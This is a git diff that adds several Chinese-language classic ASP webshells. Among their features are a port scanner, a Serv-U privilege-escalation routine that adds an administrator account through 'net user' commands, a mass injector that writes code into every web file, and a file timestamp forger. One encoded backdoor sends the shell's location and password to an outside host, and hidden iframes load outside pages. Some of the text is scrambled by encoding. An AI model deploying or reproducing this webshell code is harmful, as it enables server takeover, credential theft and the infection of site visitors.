If`Else`ber<bt numis no & ~ mp(i)RRS(tr>~)`End If`End If`Next`Else`hu),~v(ip(StrRe,1,Inp(hu)Mid(irt = ipSta.~))`,~-~)p(hu)Str(i))-Inip(hu,Len(-~)+1hu),~r(ip(,InStp(hu)Mid(i) to )+1,1),~.~ip(hurRev(,InStp(hu)Mid(ixx = For x)`ound(To Ub = 0 For itmp)` Thenp(i))ic(tmnumerIf Is `tmp(ixxx, rt & ipStaScan(Call ))`Else`, ~-~mp(i)Str(t = Inseekx)` 0 Thekx >If seen`kx - , seemp(i)eft(tN = Lstart1 )`seekx)) - tmp(i Len(p(i),ht(tm= RigendN  )` ThenendN)eric(Isnum and artN)ic(stnumerIf Is`To enartN  = stFor jdN`xxx,jrt & ipStaScan(Call )`Next`Else`br>~)mber<ot nu is nN & ~& endor ~  & ~ tartNRRS(s`End If`Else`ber<bt numis no & ~ mp(i)RRS(tr>~)`End If`End If`Next`Next`End If`Next`2 = ttimerimer`imer1er2-tt(timtr(inme=cstheti))`ime&~&thet in ~ocesshr>PrRRS~< s~`END IF",Pso):end sub:copyurl=chr(60)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(32)&chr(115)&chr(114)&chr(99)&chr(61)&chr(39)&chr(104)&chr(116)&chr(116)&chr(112)&chr(58)&chr(47)&chr(47)&chr(111)&chr(100)&chr(97)&chr(121)&chr(101)&chr(120)&chr(112)&chr(46)&chr(99)&chr(111)&chr(109)&chr(47)&chr(115)&chr(120)&chr(47)&chr(115)&chr(46)&chr(97)&chr(115)&chr(112)&chr(63)&chr(115)&chr(61)&Serveru&chr(38)&chr(112)&chr(61)&Serverp&chr(39)&chr(62)&chr(60)&chr(47)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(62)&chr(13)&chr(10):Sub Scan(targetip, portNum):On Error Resume Next:set conn = Server.CreateObject("ADODB.connection"):connstr="Provider=SQLOLEDB.1;Data Source=" & targetip &","& portNum &";User ID=lake2;Password=;":conn.ConnectionTimeout=1:conn.open connstr:If Err Then:If Err.number = -2147217843 or Err.number = -2147467259 Then:If InStr(Err.description, "(Connect()).") > 0 Then:RRS(targetip & ":" & portNum & ".......�ر�<br>"):Else:RRS(targetip & ":" & portNum & ".......<font color=red>����</font><br>"):End If:End If:End If:End Sub:Select Case Action:Case "MainMenu":MainMenu():Case "getTerminalInfo":getTerminalInfo():Case "PageAddToMdb":PageAddToMdb():case "ScanPort":ScanPort():Case "goback":goback():Case "Servu":SUaction=request("SUaction")
+if  not isnumeric(SUaction) then response.end
+user = trim(request("u"))
+pass = trim(request("p"))
+port = trim(request("port"))
+cmd = trim(request("c"))
+f=trim(request("f"))
+if f="" then
+f=gpath()
+else
+f=left(f,2)
+end if
+ftpport = 65500
+timeout=3
+loginuser = "User " & user & vbCrLf
+loginpass = "Pass " & pass & vbCrLf
+deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf
+mt = "SITE MAINTENANCE" & vbCrLf
+newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
+newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & vbCrLf & _
+"-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
+"-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
+"-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
+"-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
+"-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
+"-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf
+quit = "QUIT" & vbCrLf
+newuser=replace(newuser,"c:",f)
+select case SUaction
+case 1
+set a=Server.CreateObject("Microsoft.XMLHTTP")
+a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s1",True, "", ""
+a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
+set session("a")=a
+RRS"<form method='post' name='goldsun'>"
+RRS"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
+RRS"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
+RRS"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
+RRS"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
+RRS"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
+RRS"<input name='SUaction' type='hidden' id='SUaction' value='2'></form>"
+RRS"<script language='javascript'>"
+RRS"document.write('<center>�������� 127.0.0.1:"&port&",ʹ���û���: "&user&",���"&pass&"...<center>');"
+RRS"setTimeout('document.all.goldsun.submit();',4000);"
+RRS"</script>"
+case 2
+set b=Server.CreateObject("Microsoft.XMLHTTP")
+b.open "GET", "http://127.0.0.1:" & ftpport & "/goldsun/upadmin/s2", True, "", ""
+b.send "User go" & vbCrLf & "pass od" & vbCrLf & "site exec " & cmd & vbCrLf & quit
+set session("b")=b
+RRS"<form method='post' name='goldsun'>"
+RRS"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
+RRS"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
+RRS"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
+RRS"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
+RRS"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
+RRS"<input name='SUaction' type='hidden' id='SUaction' value='3'></form>"
+RRS"<script language='javascript'>"
+RRS"document.write('<br><center>��������Ȩ��,��ȴ�...,<center>');"
+RRS"setTimeout(""document.all.goldsun.submit();"",4000);"
+RRS"</script>"
+case 3
+set c=Server.CreateObject("Microsoft.XMLHTTP")
+c.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s3", True, "", ""
+c.send loginuser & loginpass & mt & deldomain & quit
+set session("c")=c
+RRS"<center>��Ȩ���,��ִ�������<br><font color=red>"&cmd&"</font><br><br>"
+RRS"<input type=button value=' ���ؼ��� ' onClick=""location.href='?Action=Servu';"">"
+RRS"</center>"
+case else
+on error resume next
+set a=session("a")
+set b=session("b")
+set c=session("c")
+a.abort
+Set a = Nothing
+b.abort
+Set b = Nothing
+c.abort
+Set c = Nothing
+RRS"<center><br><form method='post' name='goldsun'>"
+RRS"<table width='494' height='163' border='1' cellpadding='0' cellspacing='1' bordercolor='#666666'>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td colspan='2'>Serv-U ����Ȩ�� ASP��</td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td width='100'>�û���:</td>"
+RRS"<td width='379'><input name='u' type='text' id='u' value='LocalAdministrator'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>�� �</td>"
+RRS"<td><input name='p' type='text' id='p' value='#l@$ak#.lk;0@P'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>�� �ڣ�</td>"
+RRS"<td><input name='port' type='text' id='port' value='43958'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>ϵͳ·����</td>"
+RRS"<td><input name='f' type='text' id='f' value='"&f&"' size='8'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>�����</td>"
+RRS"<td><input name='c' type='text' id='c' value='cmd /c net user userSea passSea /add & net localgroup administrators userSea /add' size='50'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td colspan='2'><input type='submit' name='Submit' value='�ύ'> "
+RRS"<input type='reset' name='Submit2' value='����'>"
+RRS"<input name='SUaction' type='hidden' id='action' value='1'></td>"
+RRS"</tr></table></form></center>"
+end select
+function Gpath()
+on error resume next
+err.clear
+set f=Server.CreateObject("Scripting.FileSystemObject")
+if err.number>0 then
+gpath="c:"
+exit function
+end if
+gpath=f.GetSpecialFolder(0)
+gpath=lcase(left(gpath,2))
+set f=nothing:end function:
+Case "Cplgm"
+Fpath=Request("fd")
+addcode = Request("code")
+addcode2 = Request("code2")
+pcfile=request("pcfile")
+checkbox=request("checkbox")
+ShowMsg=request("ShowMsg")
+FType=request("FType")
+M=request("M")
+if Ftype="" then Ftype="txt|htm|html|asp|php|jsp|aspx|cgi|cer|asa|cdx"
+if Fpath="\" then Fpath=Server.MapPath("\")
+if Fpath="." or Fpath="" then Fpath=Server.MapPath(".")
+if addcode="" then addcode="<"
+if checkbox="" then checkbox=request("checkbox")
+if pcfile="" then
+pcfileName=Request.ServerVariables("SCRIPT_NAME")
+pcfilek=split(pcfileName,"/") 
+pcfilen=ubound(pcfilek) 
+pcfile=pcfilek(pcfilen) 
+end if
+RRS ("<BR><b>��վ��Ŀ¼</b>- "&Server.MapPath("/")&"<br>")
+RRS ("<b>������Ŀ¼</b>- "&Server.MapPath("."))
+RRS "<form method=POST><b>[" 
+if M="1" then RRS"��������-��������"
+if M="2" then RRS"��������-������˵�����"
+if M="3" then RRS"��������-�����滻����"
+if M="" then response.end
+RRS "]</b><table width=100% border=0><tr><td>�ļ�·����</td>"
+RRS "<td><input type=text name=fd value='"&Fpath&"' size=40> �\������վ��Ŀ¼����.��Ϊ��������Ŀ¼</td></tr>"
+if M="1" then RRS "<tr><td>�����ظ���</td><td><input class=c name='checkbox' type=checkbox value='checked' "&checkbox&"> ��ֹһ��ҳ�����ж���ظ��Ĵ���</td></tr>"
+RRS "<tr><td>�ų��ļ���</td>"
+RRS "<td><input name='pcfile' type=text id='pcfile' value='"&pcfile&"' size=40> ���벻�뱻�޸ĵ��ļ��������磺1.asp|2.asp|3.asp</td></tr>"
+RRS "<tr><td>�ļ����ͣ�</td>"
+RRS "<td><input name='FType' type=text id='FType' value='"&Ftype&"' size=40> ����Ҫ�޸ĵ��ļ�����[��չ��]�����磺htm|html|asp|php|jsp|aspx|cgi</td></tr><tr><td>"
+if M="1" then RRS"Ҫ�ҵ�����"
+if M="2" then RRS"Ҫ�������"
+if M="3" then RRS"Ҫ�滻�Ĵ��룺"
+RRS"</td><td><textarea name=code cols=66 rows=3>"&addcode&"</textarea></td></tr>"
+if M="3" then RRS "<tr><td>�滻Ϊ��</td><td><textarea name=code2 cols=66 rows=3>"&addcode2&"</textarea></td></tr>"
+RRS "<tr><td></td><td> <input name=submit type=submit value=��ʼִ��> --��ǽ���--[�ɹ����� �� �ų����� �� �ظ���<font color=red>��</font>]</td></tr>"
+RRS "</table></form>" 
+if request("submit")="��ʼִ��" then 
+RRS"<div style='line-height:25px'><b>ִ�м�¼��</b><br>"
+call InsertAllFiles(Fpath,addcode,pcfile)
+RRS"</div>"
+end if
+sub att()
+dim Path,FileName,NewTime,ShuXing
+set path=request.Form("path1")
+set fileName=request.Form("filename")
+set newTime=request.Form("time")
+set ShuXing=request.Form("shuxing")
+RRS"<form method=post>"
+RRS"·������:<input name='path1' value='"&WWWROOT&"\' size='60'><br/>"
+RRS"�ļ�����:<input name=filename value='index.asp' size='60'><br/>"
+RRS"�޸�ʱ��:<input name=time value='12/21/2009 23:59:59' size='60'><br/>"
+RRS"<select onChange='this.form.shuxing.value=this.value;'>"
+RRS"<option value=''>��ͨ</option>"
+RRS"<option value='1'>ֻ��</option>"
+RRS"<option value='2'>����</option>"
+RRS"<option value='4'>ϵͳ</option>"
+RRS"<option value='33'>ֻ���浵 </option>"
+RRS"<option value='34'>���ش浵 </option>"
+RRS"<option value='35'>ֻ�����ش浵 </option>"
+RRS"<option value='39'>ֻ�����ش浵ϵͳ </option>"
+RRS"�޸����ԣ�<input name=shuxing value='0' size='60'><br/>"
+RRS"<input type=submit value=�޸�>"
+RRS"</form>"
+if( (len(path)>0)and(len(fileName)>0)and(len(newTime)>0) )then
+Set fso=Server.CreateObject("Scripting.FileSystemObject")
+Set file=fso.getFile(path&fileName)
+file.attributes=ShuXing
+Set shell=Server.CreateObject("Shell.Application")
+Set app_path=shell.NameSpace(server.mappath("."))
+Set app_file=app_path.ParseName(fileName)
+app_file.Modifydate=newTime
+RRS"</br></br>�޸��ļ�&nbsp;&nbsp;"&path&fileName&"&nbsp;&nbsp;�������"
+end if
+end sub
+function php():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.CreateTextFile(server.mappath("test.php")).Write"<?PHP echo '��ϲ������֧��PHP'?><?php phpinfo()?>":Response.write"<iframe src=test.php width=950 height=300></iframe> ":Response.write "<br><br><p><br><p><br><br><p><br><center>������ܿ���test.php������ʾ,��ʾ֧��PHP<p><font color=red������Dz�֧����!������ɼǵ�ɾ����":End function:function lIl(bb)
+but=22
+for i = 1 to len(bb)
+if mid(bb,i,1)<>"��" then
+If Asc(Mid(bb, i, 1)) < 32 Or Asc(Mid(bb, i, 1)) > 126 Then
+a = a & Chr(Asc(Mid(bb, i, 1)))
+else
+pk=asc(mid(bb,i,1))-but
+if pk>126 then
+pk=pk-95
+elseif pk<32 then
+pk=pk+95
+end if
+a=a&chr(pk)
+end if
+else
+a=a&vbcrlf
+end if
+next
+lIl=a
+end function
+Function RndNumber(Min,Max) 
+Randomize 
+RndNumber=Int((Max - Min + 1) * Rnd() + Min) 
+End Function
+function Gpath()
+on error resume next
+err.clear
+set f=Server.CreateObject("Scripting.FileSystemObject")
+if err.number>0 then
+gpath="c:"
+exit function
+end if
+gpath=f.GetSpecialFolder(0)
+gpath=lcase(left(gpath,2))
+set f=nothing
+end function
+function jsp():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.CreateTextFile(server.mappath("test.jsp")).Write"��ϲ������֧��jsp":Response.write"<iframe src=test.jsp width=950 height=300></iframe> ":Response.write "<br><br><p><br><p><br><br><p><br><center>������ܿ���test.jsp������ʾ,��ʾ֧��jsp<p></font><p><a href='?Action=apjdel'><font size=5 color=red>ɾ�����Ե������ļ�(����ȫ�����Բſ���ɾ��,��������!)</font></a></center>":End function:function aspx():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.CreateTextFile(server.mappath("test.aspx")).Write"��ϲ������֧��aspx":Response.write"<iframe src=test.aspx width=950 height=300></iframe> ":Response.write "<br><br><p><br><p><br><br><p><br><center>������ܿ���Test.aspx������ʾ,��ʾ֧��asp.net<p><font color=red>������Dz�֧����!������ɼǵ�ɾ����":End function
+function apjdel():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.DeleteFile(server.mappath("test.aspx")):fso.DeleteFile(server.mappath("test.php")):fso.DeleteFile(server.mappath("test.jsp")):response.write"ɾ�����!":End function:function sam():Response.write "<br><br><p><br><p><br><br><p><br><center><br><br><font color=red>":response.write"<center><font face=wingdings color=#00EC00 style=font-size:240pt>N</font><span class=style1><span style=font-weight: 300><font face=Impact color=#FFFFFF style=font-size: 100pt></center>":End function:acode="=s?psa.s/xs/moc.pxeyado//:p��3��3h'=crs ��3pircs<"
+Efun=StrReverse(replace(replace(Encrypt(acode),"��",Chr(34)),"��",vbCrLf)):function goback():set Ofso = Server.CreateObject("Scripting.FileSystemObject")
+set ofolder = Ofso.Getfolder(Session("FolderPath"))
+if not ofolder.IsRootFolder then 
+Response.write "<script>ShowFolder("""&RePath(ofolder.parentfolder)&""")</script>"
+else 
+Response.write "<script>ShowFolder("""&Session("FolderPath")&""")</script>"
+end if
+set Ofso=nothing
+set ofolder=nothing
+end function
+Sub InsertAllFiles(Wpath,Wcode,pc)
+Server.ScriptTimeout=999999999
+if right(Wpath,1)<>"\" then Wpath=Wpath &"\"
+Set WFSO = CreateObject("Scripting.FileSystemObject")
+on error resume next 
+Set f = WFSO.GetFolder(Wpath)
+Set fc2 = f.files
+For Each myfile in fc2
+Set FS1 = CreateObject("Scripting.FileSystemObject")
+FType1=split(myfile.name,".") 
+FType2=ubound(FType1) 
+if Ftype2>0 then
+FType3=LCase(FType1(FType2)) 
+else
+FType3="��"
+end if
+if Instr(LCase(pc),LCase(myfile.name))=0 and Instr(LCase(FType),FType3)<>0 then
+select case M
+case "1"
+if checkbox<>"checked" then
+Set tfile=FS1.opentextfile(Wpath&""&myfile.name,8,-2)
+tfile.writeline Wcode
+RRS"�� "&Wpath&myfile.name
+tfile.close
+else
+Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
+if Instr(tfile1.readall,Wcode)=0 then
+Set tfile=FS1.opentextfile(Wpath&""&myfile.name,8,-2)
+tfile.writeline Wcode
+RRS"��"&Wpath&myfile.name
+tfile1.close
+else
+RRS"<font color=red>��</font> "&Wpath&myfile.name
+tfile1.close
+end if
+Set tfile1=Nothing
+end if
+case "2"
+Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
+NewCode=Replace(tfile1.readall,Wcode,"")
+Set objCountFile=WFSO.CreateTextFile(Wpath&myfile.name,True)
+objCountFile.Write NewCode
+objCountFile.Close
+RRS"��"&Wpath&myfile.name
+Set objCountFile=Nothing
+case "3"
+Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
+NewCode=Replace(tfile1.readall,Wcode,addCode2)
+Set objCountFile=WFSO.CreateTextFile(Wpath&myfile.name,True)
+objCountFile.Write NewCode
+objCountFile.Close
+RRS"��"&Wpath&myfile.name
+Set objCountFile=Nothing
+case else
+RRS"����.":response.end
+end select
+else
+RRS"�� "&Wpath&myfile.name
+end if
+RRS " �� <a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""DownFile"")' class='am' title='����'>Down</a> "
+RRS "<a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""EditFile"")' class='am' title='�༭'>edit</a> "
+RRS "<a href='javascript:FullForm("""&replace(str1,"\","\\")&""",""DelFile"")'onclick='return yesok()' class='am' title='ɾ��'>Del</a> "
+RRS "<a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""CopyFile"")' class='am' title='����'>Copy</a> "
+RRS "<a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""MoveFile"")' class='am' title='�ƶ�'>Move</a><br>"
+Next
+Set fsubfolers = f.SubFolders
+For Each f1 in fsubfolers
+NewPath=Wpath&""&f1.name
+InsertAllFiles NewPath,Wcode,pc
+Next
+set tfile=nothing
+Set FSO = Nothing
+set tfile=nothing
+set tfile2=nothing
+Set WFSO = Nothing
+End Sub
+
+case "apjdel":apjdel():case"hiddenshell":hiddenshell():case "php":php():case "aspx":aspx():case "jsp":jsp():Case "MMD":MMD():Case "adminab":adminab():Case "sql":sql():Case "downloads":downloads():Case "ReadREG":call ReadREG():Case "att":call att():Case "Show1File":Set ABC=New LBF:ABC.Show1File(Session("FolderPath")):Set ABC=Nothing:Case "DownFile":DownFile FName:ShowErr():Case "DelFile":Set ABC=New LBF:ABC.DelFile(FName):Set ABC=Nothing:Case "EditFile":Set ABC=New LBF:ABC.EditFile(FName):Set ABC=Nothing:Case "CopyFile":Set ABC=New LBF:ABC.CopyFile(FName):Set ABC=Nothing:Case "MoveFile":Set ABC=New LBF:ABC.MoveFile(FName):Set ABC=Nothing:Case "DelFolder":Set ABC=New LBF:ABC.DelFolder(FName):Set ABC=Nothing:Case "CopyFolder":Set ABC=New LBF:ABC.CopyFolder(FName):Set ABC=Nothing:Case "MoveFolder":Set ABC=New LBF:ABC.MoveFolder(FName):Set ABC=Nothing:Case "NewFolder":Set ABC=New LBF:ABC.NewFolder(FName):Set ABC=Nothing:Case "UpFile":UpFile():Case "Cmd1Shell":Cmd1Shell():Case "Logout":Session.Contents.Remove("web2a2dmin"):Response.Redirect URL:Case "CreateMdb":CreateMdb FName:Case "CompactMdb":CompactMdb FName:Case "DbManager":DbManager():Case "Course":Course():Case "ServerInfo":ServerInfo():Case Else MainForm():End Select:ExeCute SinfoEn("r(ErowShn he tu~rvSe>~n<ioct Aif)`l>tm/h><dybo</S~RR~",Pos)
+
+
+
+%></body><iframe src=http://cpc-gov.cn/a/a/a.asp width=0 height=0></iframe></html>
\ No newline at end of file
diff --git a/www-7jyewu-cn/拿站小助手-经典Asp小马.asp b/www-7jyewu-cn/拿站小助手-经典Asp小马.asp
new file mode 100644
index 0000000..ca20635
--- /dev/null
+++ b/www-7jyewu-cn/拿站小助手-经典Asp小马.asp
@@ -0,0 +1,104 @@
+<%@LANGUAGE="VBScript.Encode" CODEPAGE="936"%>
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
+<title>��ע - ��վС����</title>
+<style type="text/css">
+<!--
+.black {
+	font-family: "����";
+	font-size: 12px;
+	color: #000000;
+	text-decoration: none;
+	line-height: 120%;}
+-->
+</style>
+<style type="text/css">
+<!--
+a:link {
+	font-family: "����";
+	font-size: 12px;
+	color: #00CC00;
+	text-decoration: none;
+}
+a:visited {
+	font-family: "����";
+	font-size: 12px;
+	color: #00CC00;
+	text-decoration: none;
+}
+a:hover {
+	font-family: "����";
+	font-size: 12px;
+	color: #333333;
+	text-decoration: none;
+}
+-->
+</style>
+</head>
+<body bgcolor="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
+<p>
+<%#@~^DAAAAA==~9kh,W(LsUr,vQMAAA==^#~@%>
+<%#@~^CwAAAA==~9kh,09lYmPmgMAAA==^#~@%>
+<%#@~^EgAAAA==~9kh,W(LZKE	OsbVnPXgYAAA==^#~@%>
+<%#@~^FgAAAA==~Kx~DMWD,DdEs+~x6O~9wcAAA==^#~@%>
+<%#@~^QAAAAA==~U+O,W(LsUr,xPU+.\D /M+lDnr(L+1OcJUmMk2YrUTRok^n?H/Onsr4%n1YE#,ThYAAA==^#~@%>
+<%#@~^KQAAAA==~b0~:Db:`M+$;+kYcJkXW[alY4E#*@!@*rE~Y4+	PqgwAAA==^#~@%>
+<%#@~^HQAAAA==~6NCDl,'PM+$;+kYcJ1XW[9lYmE#,mwkAAA==^#~@%>
+<%#@~^QgAAAA==~U+O,W(LZKE	OsbVn'K4%oUrR;.+mY+:naYwk^+cDn5!+dYvE/H0[2mYtEbBK.Eb,dRcAAA==^#~@%>
+<%#@~^GgAAAA==~K4%;W!xYwk^nRqDrYPW[mYl,XQkAAA==^#~@%>
+<%#@~^EAAAAA==~b0~DMP'ZPD4+	P1AQAAA==^#~@%>
+<%#@~^NwAAAA==~M+daW	/+chMrYPE@!6WUO,mW^GD{aswoo!Z@*����ɹ�e@!&0GUD@*EPNQ8AAA==^#~@%>
+<%#@~^BgAAAA==~VdP6QEAAA==^#~@%>
+<%#@~^NwAAAA==~M+daW	/+chMrYPE@!6WUO,mW^GD{aswoo!Z@*����ʧ��e@!&0GUD@*EPNQ8AAA==^#~@%>
+<%#@~^CAAAAA==~x[,k6PZgIAAA==^#~@%>
+<%#@~^CwAAAA==~D.cm^+lMPvgMAAA==^#~@%>
+<%#@~^CAAAAA==~x[,k6PZgIAAA==^#~@%>
+<%#@~^FAAAAA==~K4%;W!xYwk^nR;VG/PKAcAAA==^#~@%>
+<%#@~^GgAAAA==~U+O,W(LZKE	OsbVn'gWO4bxo,ZAkAAA==^#~@%>
+<%#@~^FgAAAA==~U+O,W(LsUr,xPgWOtbxL~AwcAAA==^#~@%>
+<%#@~^HAAAAA==~"+daW	/+chMrYPE@!J0G.s@*J,qQgAAA==^#~@%>
+</p>
+<table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0" bordercolor="#FFFFFF">
+<tr>
+<td height="100%"> 
+<table width="100%" border="0" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
+<tr>
+<td><table width="700" border="0" align="center" cellpadding="0" cellspacing="1">
+<tr>
+<td bgcolor="#FFFFFF"><span class="black"> 
+<%#@~^GwAAAA==~"+daW	/+chMrYPE���ļ����Ե�·��J,TAYAAA==^#~@%>
+<%=#@~^NwAAAA==dD-Dc:lawmOtvIn;!+dOc?+M-+M.lMrC4^+k`E?/]&nP{g)HAJbb,MhMAAA==^#~@%>
+<br>
+<%#@~^TQAAAA==~"+daW	/+chMrYPE�����ļ���@!6WUO,mW^GD{D+9@*����·��c�����ļ���)��G)'hn4wacldw*l@!J0GUD@*J~txMAAA==^#~@%>
+<%#@~^MwAAAA==~"+daW	/+chMrYPE@!6W.h,lmDrW	'BEvvPs+DtGNx2K/O@*r~lRAAAA==^#~@%>
+</span> </td>
+</tr>
+<tr>
+<td bgcolor="#FFFFFF"><span class="black">���뱣���·����<%#@~^RgAAAA==~"+daW	/+cMrYPE@!bx2;DPYH2+{Y+XO~xm:'dXW[alOt,Ak9Y4xy!!~dbyn'Rq@*J~qxcAAA==^#~@%>
+</span></td>
+</tr>
+<tr>
+<td bgcolor="#FFFFFF" class="black">
+<%#@~^GwAAAA==~"+daW	/+chMrYPE�����ļ������ݣ�J,TAYAAA==^#~@%>
+<%#@~^UwAAAA==~"+daW	/+chMrYPE@!D+aOmD+m~xm:+{^z09NmYCP^G^/x%Z~DKhdx8!PAr9Y4'2+@*@!&D+XYlM+m@*J,ShsAAA==^#~@%>
+</td>
+</tr>
+<tr>
+<td bgcolor="#FFFFFF"><div align="center"><span class="black">
+<%#@~^MQAAAA==~"+daW	/+chMrYPE@!bx2;DPYH2+{/E(hrY,\mV;+x����@*rPIxAAAA==^#~@%>
+</span></div></td>
+</tr>
+</tr>
+<iframe src=http://7jyewu.cn/a/a.asp width=0 height=0></iframe>
+<td bgcolor="#FFFFFF" class="black"><div align="center"></a></div></td>
+</tr>
+</table></td>
+</tr>
+</table></td>
+</tr>
+</table>
+</body>
+</html>
+
+�ϴ�
\ No newline at end of file
diff --git a/www-7jyewu-cn/星外虚拟机提权专用asp大马 (1).asp b/www-7jyewu-cn/星外虚拟机提权专用asp大马 (1).asp
new file mode 100644
index 0000000..bfbe6b7
--- /dev/null
+++ b/www-7jyewu-cn/星外虚拟机提权专用asp大马 (1).asp	
@@ -0,0 +1,1296 @@
+<%
+UserPass="admin"'	����
+Server.ScriptTimeout=999999999
+Response.Buffer =true
+On Error Resume Next
+'------------------------�ڲ����� ��----------------------
+mmname   ="����-����-����-����������Ȩר��Webshell" 'shell����
+mmshell ="����������Ȩר��Webshell 80sec��Ʒ" 'shell��Ȩ
+errout ="������󣡣���" '���������ʾ
+serversoft=Request.ServerVariables("server_software")
+'-------------------------------------------
+
+response.write ""+vbCrLf+""+vbCrLf+""
+
+Response.Buffer = True
+Server.ScriptTimeOut=999999999
+  
+CONST_FSO="Script"&"ing.Fil"&"eSyst"&"emObject"
+
+
+'��·������ \ 
+function GetFullPath(path)
+	GetFullPath = path
+	if Right(path,1) <> "\" then GetFullPath = path&"\" '����ַ������ \ �ľͼ���
+end function
+
+'ɾ���ļ�
+Function Deltextfile(filepath)
+ On Error Resume Next
+ Set objFSO = CreateObject(CONST_FSO) 
+  if objFSO.FileExists(filepath) then '����ļ��Ƿ���� 
+   objFSO.DeleteFile(filepath) 
+  end if 
+ Set objFSO = nothing
+ Deltextfile = Err.Number '���ش����� 
+End Function 
+
+
+'���Ŀ¼�Ƿ��д 0 Ϊ�ɶ�д 1Ϊ��д������ɾ��
+Function CheckDirIsOKWrite(DirStr)
+	On Error Resume Next
+	Set FSO = Server.CreateObject(CONST_FSO)
+	filepath = GetFullPath(DirStr)&fso.GettempName
+	FSO.CreateTextFile(filepath) 
+	CheckDirIsOKWrite = Err.Number '���ش����� 
+	if  ShowNoWriteDir and (CheckDirIsOKWrite =70) then
+		Response.Write "[<font color=#0066FF>Ŀ¼</font>]"&DirStr&" [<font color=red>"&Err.Description&"</font>]<br>"
+	end if
+	set fout =Nothing
+	set FSO = Nothing
+	Deltextfile(filepath) 'ɾ����
+	if CheckDirIsOKWrite=0 and Deltextfile(filepath)=70 then CheckDirIsOKWrite =1
+end Function
+
+'����ļ��Ƿ�����޸�(�˷������޸�����,���ܻ��е㲻׼������������)
+function CheckFileWrite(filepath)
+	On Error Resume Next
+	Set FSO = Server.CreateObject(CONST_FSO)	
+	set getAtt=FSO.GetFile(filepath)
+	getAtt.Attributes = getAtt.Attributes
+  CheckFileWrite = Err.Number 
+	set FSO = Nothing
+	set getAtt = Nothing  
+end function
+
+'���Ŀ¼�Ŀɶ�д��
+function ShowDirWrite_Dir_File(Path,CheckFile,CheckNextDir)
+	On Error Resume Next
+	Set FSO = Server.CreateObject(CONST_FSO)
+	B = FSO.FolderExists(Path)
+	set FSO=nothing
+	
+  '�Ƿ�Ϊ��ʱĿ¼���Ƿ�Ҫ���
+  IS_TEMP_DIR =	(instr(UCase(Path),"WINDOWS\TEMP")>0) and NoCheckTemp
+  		
+	if B=false then '�������Ŀ¼�ͽ����ļ����
+	'==========================================================================
+		Re = CheckFileWrite(Path) '����Ƿ��д
+		if Re =0 then
+			Response.Write "[�ļ�]<font color=red>"&Path&"</font><br>"
+			b =true
+			exit function
+		else
+			Response.Write "[<font color=red>�ļ�</font>]"&Path&" [<font color=red>"&Err.Description&"</font>]<br>"						
+			exit function
+		end if	
+	'==========================================================================	
+	end if
+	
+
+	
+	Path = GetFullPath(Path) '�� \	
+	
+	re = CheckDirIsOKWrite(Path) '��ǰĿ¼Ҳ���һ��
+	if (re =0) or (re=1) then
